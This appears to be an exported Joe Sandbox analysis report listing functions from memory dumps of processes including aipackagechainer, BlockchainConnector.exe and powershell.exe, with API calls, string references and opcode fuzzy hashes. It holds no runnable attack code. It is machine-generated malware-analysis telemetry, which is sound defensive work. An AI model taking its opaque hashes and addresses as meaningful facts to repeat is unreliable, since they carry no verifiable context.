Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalFileLeaveModuleNameSection
String ID: LOG
API String ID: 1232429956-429402703
Opcode ID: fb0abecd5f7912b8de9c24a5b6b91d47128c0ca3723ceff07336cbd55405ec3b
Instruction ID: c4183a491b74954607d1101f5841f114dc8f13be8dfec02728d694bce2a7c042
Opcode Fuzzy Hash: fb0abecd5f7912b8de9c24a5b6b91d47128c0ca3723ceff07336cbd55405ec3b
Instruction Fuzzy Hash: 055147B1A202449FCF15DF28C8057BA77F9FF46700F14856AE80ADB741E7B19995CB80

Function 0025DA90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

GetLastError.KERNEL32(?,00000000,00000001,08000000), ref: 0025DB14
WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,00000001,08000000), ref: 0025DB4D

Strings

REST %u, xrefs: 0025DAE1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorHeapLastObjectProcessSingleWait
String ID: REST %u
API String ID: 1530046183-3183379045
Opcode ID: b6be5c4bf1bef19758f5f106a650aa9ee63be03ed644986f802406463f110cc6
Instruction ID: daf11d44ed4c4a9352b6eb3f7654c428ce42de19b6779d2e748a86fbba39eaa5
Opcode Fuzzy Hash: b6be5c4bf1bef19758f5f106a650aa9ee63be03ed644986f802406463f110cc6
Instruction Fuzzy Hash: D5512730610605DFDB30CF68CC88B6AB7E6FF41329F158669E8168B6A1DB70EC59CB44

Function 00239230 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,4938EAB5,?,?,002D8AF4), ref: 0023926F
CreateDirectoryW.KERNEL32(?,00000000,?,002D8AF4), ref: 002392D0

Strings

ADVINST_LOGS, xrefs: 002392A8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CreateDirectoryPathTemp
String ID: ADVINST_LOGS
API String ID: 2885754953-2492584244
Opcode ID: ae3c6ee2b76cacf8d436a6e9158d91212e141f7b69ba96ee7b3011f51902dc67
Instruction ID: 8f53551e0b0b0875f44c7d0bd261d3456712b5dd69835ca2eb1c460cdb9be06d
Opcode Fuzzy Hash: ae3c6ee2b76cacf8d436a6e9158d91212e141f7b69ba96ee7b3011f51902dc67
Instruction Fuzzy Hash: 5851D2B592021ACBCB209F28C8487BAB3B4FF16314F1446AED859972D0EBB44DD1CB90

Function 00295BA2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0028D3E6: HeapFree.KERNEL32(00000000,00000000,?,00286E8D,00000000,?,?,0024F90D,?,?,00000000,0024CF81,4938EAB5), ref: 0028D3FC
Part of subcall function 0028D3E6: GetLastError.KERNEL32(?,?,00286E8D,00000000,?,?,0024F90D,?,?,00000000,0024CF81,4938EAB5), ref: 0028D407

___free_lconv_mon.LIBCMT ref: 00295BE6

Strings

Xb-, xrefs: 00295C8E
p`-, xrefs: 00295BB8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: Xb-$p`-
API String ID: 4068849827-2864208545
Opcode ID: 2d6fb00e4aa76353705bacba6dcd4453310150e7a80cef9bf562bbd2de59eb83
Instruction ID: 9ab1b00ac7922e0fce4ab18a58b8d45d6c07d794cc0709633d5ad0022dc88035
Opcode Fuzzy Hash: 2d6fb00e4aa76353705bacba6dcd4453310150e7a80cef9bf562bbd2de59eb83
Instruction Fuzzy Hash: 0C313831A25B16AFEF32AF38D885B5A73E8AF00350F14486AE055D66D1DB70E9A4CF11

Function 0028061E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00280643

Strings

MOC, xrefs: 00280655
RCC, xrefs: 0028065D

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: fcadf053dacc853a7288b0159a1ce254148cdfc8d9c4532bf63962643f359929
Instruction ID: ae76c2451e201d46df2194c9b2c6ce22a2f86cbf8d58dca6ee384f72a7259088
Opcode Fuzzy Hash: fcadf053dacc853a7288b0159a1ce254148cdfc8d9c4532bf63962643f359929
Instruction Fuzzy Hash: 5E418C7691220AAFDF15EF94CC81AEEBBB5FF48300F198199F90867291D335A960DF50

Function 00218D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00218D4B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00218DAE

Strings

bad locale name, xrefs: 00218DD1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 2a311086992c2615ac124674a6eff2e43cb032dc08003765f099b969930bff85
Instruction ID: c02f0f48527915e203db0999cb0ed35098e9acf077a473133708a1350a65679f
Opcode Fuzzy Hash: 2a311086992c2615ac124674a6eff2e43cb032dc08003765f099b969930bff85
Instruction Fuzzy Hash: 2021F070815B84DED721CF68C90478BBFF4AF15310F10868ED08997781D3B5AA04CBA2

Function 002799B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,002798F7,0000001C,00279AEC,00000000,?,?,?,?,?,?,?,002798F7,00000004,002D77FC,00279B7C), ref: 002799C3
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,002798F7,00000004,002D77FC,00279B7C), ref: 002799DE

Strings

D, xrefs: 002799D2

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 222e0fce73db14fe8e117c887f819a4878ce8856fac7e792c8906e41e1defe83
Instruction ID: 6d495c67caeed89c4d27fe104a61e1d869a07b63347b8c857f368429f5d6079a
Opcode Fuzzy Hash: 222e0fce73db14fe8e117c887f819a4878ce8856fac7e792c8906e41e1defe83
Instruction Fuzzy Hash: 1201F73261020AABDF14DE29DC05BED7BA9AFC4324F0CC225AD1DE7244EA34DC528A80

Function 00279DDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0022E4E0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,4938EAB5,?,Function_0008B9F0,000000FF), ref: 0022E507
Part of subcall function 0022E4E0: GetLastError.KERNEL32(?,00000000,00000000,4938EAB5,?,Function_0008B9F0,000000FF), ref: 0022E511

IsDebuggerPresent.KERNEL32(?,?,?,002116CF), ref: 00279E0E
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002116CF), ref: 00279E1D

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00279E18

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 947e8dabed73a3db01d8464a2e6f45387617e64089e9c8451c33da502bc7bb36
Instruction ID: 0aea29c5a49854d440426369dd43fd89ea3d8bd92ef30d59ac97df7e09d452e0
Opcode Fuzzy Hash: 947e8dabed73a3db01d8464a2e6f45387617e64089e9c8451c33da502bc7bb36
Instruction Fuzzy Hash: 96E06DB06107518FD730EF64F4087837BE4AB05748F01891EF89AC2240EBB0E895CF52

Function 00223C80 Relevance: 5.2, APIs: 4, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(002243D3,002243D3), ref: 00223DBD
HeapFree.KERNEL32(00000000,002243D3,002243D3), ref: 00223DC3
GetProcessHeap.KERNEL32(002242D4,?), ref: 00223DF7
HeapFree.KERNEL32(00000000,002242D4,?), ref: 00223DFD

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5560547a2f52c75749ec06349bcf44b6fa9d61c029f5b06babd3bd72f744ca63
Instruction ID: 3a825ff1e9821995a58f1f8eaf80014d05c8c2ee5cd5ffa79d1e9dfe431ac952
Opcode Fuzzy Hash: 5560547a2f52c75749ec06349bcf44b6fa9d61c029f5b06babd3bd72f744ca63
Instruction Fuzzy Hash: 2D81E6B1A20315AFEB04CF58E840B9ABBF5FF51320F158569E8199B380D779EE54CB90

Function 002733E0 Relevance: 5.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00279150: SetEvent.KERNEL32(00000002,?,?,0027341F,4938EAB5), ref: 00279166
Part of subcall function 00279150: GetLastError.KERNEL32(?,?,0027341F,4938EAB5), ref: 00279170
Part of subcall function 00279150: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0027341F,4938EAB5), ref: 0027917C
Part of subcall function 00279150: GetLastError.KERNEL32(?,?,0027341F,4938EAB5), ref: 00279187
Part of subcall function 00279150: CloseHandle.KERNEL32(?,?,?,0027341F,4938EAB5), ref: 00279191
Part of subcall function 00279150: GetLastError.KERNEL32(?,?,0027341F,4938EAB5), ref: 0027919B

GetLastError.KERNEL32 ref: 0027343C
GetLastError.KERNEL32 ref: 00273467
CloseHandle.KERNEL32(74DF2EE0,4938EAB5), ref: 0027348C
GetLastError.KERNEL32 ref: 00273496

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CloseHandle$EventObjectSingleWait
String ID:
API String ID: 2212007442-0
Opcode ID: cc10cf0ecdd670ad53b74cea24b167f35bf8b8a557bee0f5128cb245b0ed35ce
Instruction ID: 650c86d706a75fc6a0b8f73cbe584f53a60bd1bf5e090f807614e2fa727c3588
Opcode Fuzzy Hash: cc10cf0ecdd670ad53b74cea24b167f35bf8b8a557bee0f5128cb245b0ed35ce
Instruction Fuzzy Hash: 2A212771914306DBDB25CF69D854B6AFBF8FF05720F10826ED81893380DB75AA10CBA1

Analysis Process: BlockchainConnector.exePID: 7736, Parent PID: 7560COMMON

Executed Functions

Function 00007FF7A1561154 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF7A1561164

Memory Dump Source

Source File: 00000007.00000002.1907575773.00007FF7A1561000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A1560000, based on PE: true

Associated: 00000007.00000002.1907560111.00007FF7A1560000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7a1560000_BlockchainConnector.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: af705351b447f7d8fe7362aba18bf5dec47aebb100b15702f59e8798b251ba13
Instruction ID: ce8d1eecf84ae2da18182b41ead4525baf4ca5d84b4c8933c404a257e3f6d452
Opcode Fuzzy Hash: af705351b447f7d8fe7362aba18bf5dec47aebb100b15702f59e8798b251ba13
Instruction Fuzzy Hash: 6561E665E0AB06C9FB80AF56E880379B3A0BB44B84F864439D95DA7374DE7EE4408760

Function 00007FF7A1561125 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1907575773.00007FF7A1561000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A1560000, based on PE: true

Associated: 00000007.00000002.1907560111.00007FF7A1560000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7a1560000_BlockchainConnector.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f79c0fda3fdf04e54e28c6f0470840175205088bf4299f8c970ec01c924fd9
Instruction ID: b21793edc25b43ccd27cdbc1fe90b93ca5caf6122738031ac8728f9e41c98eee
Opcode Fuzzy Hash: f1f79c0fda3fdf04e54e28c6f0470840175205088bf4299f8c970ec01c924fd9
Instruction Fuzzy Hash: 45D05E75E09201DEF700EF74D8412B873706B40708F940074CE1C2B761C63896519B14

Analysis Process: powershell.exePID: 7992, Parent PID: 7536COMMON

Executed Functions

Function 077616D0 Relevance: 6.8, Strings: 5, Instructions: 583COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07761B72
4'^q, xrefs: 07761A0E
Hbq, xrefs: 07761B2B
4'^q, xrefs: 07761A18
4'^q, xrefs: 07761B68

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$Hbq
API String ID: 0-3951994845
Opcode ID: cbda74aa5b0fd797c5c9d2710b37571c379f2570852823c5b52e1dd1c6450a39
Instruction ID: 7ed911ce52dc48043f7023bc2c9e042fdad156b6c86b12ef190f4a0b3f6ba409
Opcode Fuzzy Hash: cbda74aa5b0fd797c5c9d2710b37571c379f2570852823c5b52e1dd1c6450a39
Instruction Fuzzy Hash: 7C1257B1B0431A8FC7158B78981D66B7BA2AFC2390F54C8BAD905CB359DB35CC45C7A2

Function 030E86B0 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2038049196.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_30e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955e1714addf9d1a90f31a45e37d823e04ed0b9526a768f20d2929fc1c5ff684
Instruction ID: a03577d250fe126074987a9478a0942b3e5809e20b3fe56c3912214d4bd020e9
Opcode Fuzzy Hash: 955e1714addf9d1a90f31a45e37d823e04ed0b9526a768f20d2929fc1c5ff684
Instruction Fuzzy Hash: 9E020774A012199FCB05CF98D584AAEFBF2FF88710F288559E845AB365C731ED81CB90

Function 030E29F0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2038049196.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_30e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bb3efbae95d03a6da49f68da831bd93e485b1200f615906fa51f439ecbbcd0e
Instruction ID: 0f4f0a2018a4ff01f6a1a6b2436724c369e90527a26ca759e15161af0c282061
Opcode Fuzzy Hash: 9bb3efbae95d03a6da49f68da831bd93e485b1200f615906fa51f439ecbbcd0e
Instruction Fuzzy Hash: 3F917A70A016058FCB15DF5CC5949AAFBBAFF88310B288999D815AB365C736FC51CBA0

Function 030ECC10 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2038049196.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_30e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fab35843f517bffcc77fed608d34b5dd96b2f44598c852a929c5ad05318fb8
Instruction ID: ba34152986eba5d147d701ada23eff857a058de7e7ce844d8787d63768e8053b
Opcode Fuzzy Hash: d3fab35843f517bffcc77fed608d34b5dd96b2f44598c852a929c5ad05318fb8
Instruction Fuzzy Hash: 41511630701214CFEB65EB74C8A4B6E77F6AF89244F1405A9E406EB3A0DB399D81CF10

Function 077616B5 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4321fa6f780c40f0e6b99a11d48e60ed7be0359124d05b22ae9890639bdf6e6
Instruction ID: b70d11ab776c136cbc6eb1296a75c70dc0abd09c7341c589c1f27585af130425
Opcode Fuzzy Hash: c4321fa6f780c40f0e6b99a11d48e60ed7be0359124d05b22ae9890639bdf6e6
Instruction Fuzzy Hash: 6241FCF0E0030B9FD7148B18890DA6A77A2EF81790F9584B5DD049B359D735DD44DB62

Function 030E86A1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2038049196.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_30e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e5ad203e55acffcce8d4b088d9580fc512f082da193a840e2c756de4990f2a
Instruction ID: 4c2e3dd557e114f8822b1467451897b7e0e14fa58dcfcf494a3738d20f5ab7a8
Opcode Fuzzy Hash: 50e5ad203e55acffcce8d4b088d9580fc512f082da193a840e2c756de4990f2a
Instruction Fuzzy Hash: BB211974A002199FCB04CF99D5949AAFBF1FF48310B148599D949EB765C731EC41CBA0

Function 030ECAFB Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2038049196.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_30e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a72012e42ad4cb69faf283db70709782d6f9464032e6954f7ff40b27ac50f3
Instruction ID: 3e563334248b41a839cdec2c7e1524469d2387266553e458c9231fe173b971cc
Opcode Fuzzy Hash: 68a72012e42ad4cb69faf283db70709782d6f9464032e6954f7ff40b27ac50f3
Instruction Fuzzy Hash: 3631C874A012298FEB29DF28C990F9DB7F1BF84204F1046E5D508AB3A5DA34DE85CF90

Function 0302D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2037511878.000000000302D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0302D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_302d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74857031ea37d834cd4fad111e7997aa7929f2740ba4a8b7fd54be9e80d027b5
Instruction ID: af108ec3c1dfdd009eb1008062b445cdb743a8a945f10d9e339383f6cd07518b
Opcode Fuzzy Hash: 74857031ea37d834cd4fad111e7997aa7929f2740ba4a8b7fd54be9e80d027b5
Instruction Fuzzy Hash: 55018C6140E3D09FD7128B258C94752BFB8EF43224F1D84CBE8988F2A7C2689C49C772

Function 0302D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2037511878.000000000302D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0302D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_302d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b052cdb8bc9cbab50f3fd4191e16dc3d2ac6da4682eeb285e4f658c3a4283734
Instruction ID: b01cd212e59ad4a4acef2f11626a14e8266a60d843c58f01ca843a44e7472932
Opcode Fuzzy Hash: b052cdb8bc9cbab50f3fd4191e16dc3d2ac6da4682eeb285e4f658c3a4283734
Instruction Fuzzy Hash: D601F73140A3109AE750CA25C9C4B6BFFDCDF41324F1CC469ED684A256C279DC45C7B1

Function 0776038D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 111c63d539c6b349c73a4470bd3c7346b7be2835dc5df88d053b676ccf54e156
Instruction ID: e79b4212e199981c0391203af551593cc7e591ca2b88e5cdf1b79aabfbe2457f
Opcode Fuzzy Hash: 111c63d539c6b349c73a4470bd3c7346b7be2835dc5df88d053b676ccf54e156
Instruction Fuzzy Hash: D9E0462520E3E02EC31253281C22A5B3F728F8319074A48CAD485EF2A3CA0DAC0983F7

Non-executed Functions

Function 07761310 Relevance: 10.3, Strings: 8, Instructions: 329COMMON

Download Yara Rule

Strings

$^q, xrefs: 077615F6
$^q, xrefs: 07761322
tP^q, xrefs: 07761399
$^q, xrefs: 07761348
4'^q, xrefs: 0776151D
$^q, xrefs: 07761354
4'^q, xrefs: 07761511
tP^q, xrefs: 0776138D

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-3865595929
Opcode ID: ae870063a3404c20b1f89d2e295e3d97d2f670e296453b7ba0720c2bdfbb30eb
Instruction ID: 60a493a236634a2420c11c053210b09036aa533d8822e975f2d9e5cd0d38e13b
Opcode Fuzzy Hash: ae870063a3404c20b1f89d2e295e3d97d2f670e296453b7ba0720c2bdfbb30eb
Instruction Fuzzy Hash: 42A167B17043498FC7158B79980CA66BFB5AFC2390F1888ABD846CF35ADA35CC45C7A1

Function 07761060 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

$^q, xrefs: 077611E7
$^q, xrefs: 07761212
4'^q, xrefs: 07761116
4'^q, xrefs: 0776110A
$^q, xrefs: 0776121E

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 66d971b8adc5d368575ea383249ebc825d52c972264df4b3dd1a4bb6045a01c6
Instruction ID: 66f029aaacdfca4627273f61bb786232a16b4bc455e056f2446f38206113d2a7
Opcode Fuzzy Hash: 66d971b8adc5d368575ea383249ebc825d52c972264df4b3dd1a4bb6045a01c6
Instruction Fuzzy Hash: 835138F170434ECFCB285A69981C667BBA6AFC1390F648C6BD805CB359DA35C885C7A1

Function 077631A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 077631CE
$^q, xrefs: 07763208
$^q, xrefs: 077631B2
$^q, xrefs: 077631FC

Memory Dump Source

Source File: 0000000B.00000002.2054326235.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7760000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 35b59441fa055339c8971e2a28cae64b7aab91e540247c8f8d3c12a38f333988
Instruction ID: 71fe2c14eb6c64631b2fcf20ea7bc670fce15b1d6ef4e03ef760ab1427ac01ae
Opcode Fuzzy Hash: 35b59441fa055339c8971e2a28cae64b7aab91e540247c8f8d3c12a38f333988
Instruction Fuzzy Hash: 3D216BF171030A6FDB3856699C09B27A7D7ABC1791F24882AAD09CF389CD75C845C330

Function 07763D89 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07763DF3
4'^q, xrefs: 07763DFF
